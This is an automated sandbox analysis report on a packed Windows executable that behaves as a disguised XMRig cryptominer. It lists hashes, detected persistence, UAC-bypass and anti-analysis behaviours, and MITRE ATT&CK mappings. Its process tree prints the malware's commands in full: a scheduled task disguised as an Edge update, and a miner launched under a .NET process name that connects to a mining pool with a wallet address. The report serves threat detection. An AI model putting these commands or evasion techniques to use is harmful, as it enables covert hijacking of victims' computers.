Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
04/07/2024, 22:05
General
-
Target
RunnerSys_protected.exe
-
Size
17.2MB
-
MD5
07621700c6af0996cf45a3d04eebf72d
-
SHA1
789dcf4d965009bad086a67a57ca1375b0a520e0
-
SHA256
bedfc69962e5a357c3bf9aa5e410a2f5760f4c844974b4b8f785fd2848928580
-
SHA512
506974d5449c4ed59863563aba1177a22be736c8e285bdc75d5444c5ca51d87a665af69fcc8672298615e90290bbd1cd90411fa448882823fe4258e5f25aabb4
-
SSDEEP
393216:ayP1V/VA/mtzqHYE9xPhQpuTASC0irB5AX0zPERIQTFRvYeDWzQaWKQ:xNhG/mtzg39x0SC0irDE0WzQeDyQjKQ
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 3 IoCs
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 5 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RunnerSys_protected.exe"C:\Users\Admin\AppData\Local\Temp\RunnerSys_protected.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Disables RegEdit via registry modification
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 3 /tn "MicrosoftEdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\Windows\WinHostService.exe" /f2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe --algo rx/0 --donate-level 0 --max-cpu-usage 25 -opool.hashvault.pro:8888 -u 46xzjnxQsgsMTuFqGbQXwENhgohU94dk7cEdSatqt9g6JgzUauTwLBsAxU7agCmV7rf929oWavwsyh3C8hcebCpc6mYzDvA -p xr3v --tls --tls-fingerprint=420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41.4MB
-
Filesize
4KB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
1.8MB
-
Filesize
41.4MB
-
Filesize
41.4MB
-
Filesize
5.0MB
-
Filesize
41.4MB
-
Filesize
1.8MB